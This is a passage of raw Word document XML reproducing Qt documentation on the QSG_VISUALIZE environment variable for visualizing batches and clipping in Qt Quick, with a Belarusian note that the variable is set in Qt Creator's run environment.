          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidR="00BC0789">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00BC0789">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batches</w:t>
      </w:r>
      <w:r w:rsidR="00BC0789">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visualizes batches in the renderer. Merged batches are drawn with a solid color and unmerged batches are drawn with a diagonal line pattern. Few unique colors means good batching. Unmerged batches are bad if they contain many individual nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualize-batches.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png"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"http://doc.qt.io/qt-5/images/visualize-batches.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1047" type="#_x0000_t75" alt="&quot;batches&quot;" style="width:150.9pt;height:108.3pt">
            <v:imagedata r:id="rId2096" r:href="rId2097"/>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Pr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00450174" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG</w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5EFA" w:rsidRPr="00700D31" w:rsidRDefault="00DE5C7D" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Г</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>эта</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>прап</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">ісваецца ва ўласцівасцях </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creator</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>рацуе толькі тады, калі запускаеш адладчык.</w:t>
      </w:r>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00DE5C7D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1750" w:name="visualizing-clipping"/>
      <w:bookmarkStart w:id="1751" w:name="_Toc483000909"/>
      <w:bookmarkStart w:id="1752" w:name="_Toc483003900"/>
      <w:bookmarkStart w:id="1753" w:name="_Toc483604253"/>
      <w:bookmarkStart w:id="1754" w:name="_Toc483605473"/>
      <w:bookmarkEnd w:id="1750"/>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visualizing Clipping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1751"/>
      <w:bookmarkEnd w:id="1752"/>
      <w:bookmarkEnd w:id="1753"/>
      <w:bookmarkEnd w:id="1754"/>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Setting</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clip</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>draws red areas on top of the scene to indicate clipping. As Qt Quick Items do not clip by default, no clipping is usually visualized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualize-clip.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png"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"http://doc.qt.io/qt-5/images/visualize-clip.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1048" type="#_x0000_t75" alt="" style="width:150.9pt;height:108.3pt">
            <v:imagedata r:id="rId2098" r:href="rId2099"/>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Pr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="008E2997" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2997">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2997">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5EFA" w:rsidRPr="00DE5C7D" w:rsidRDefault="00DE5C7D" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
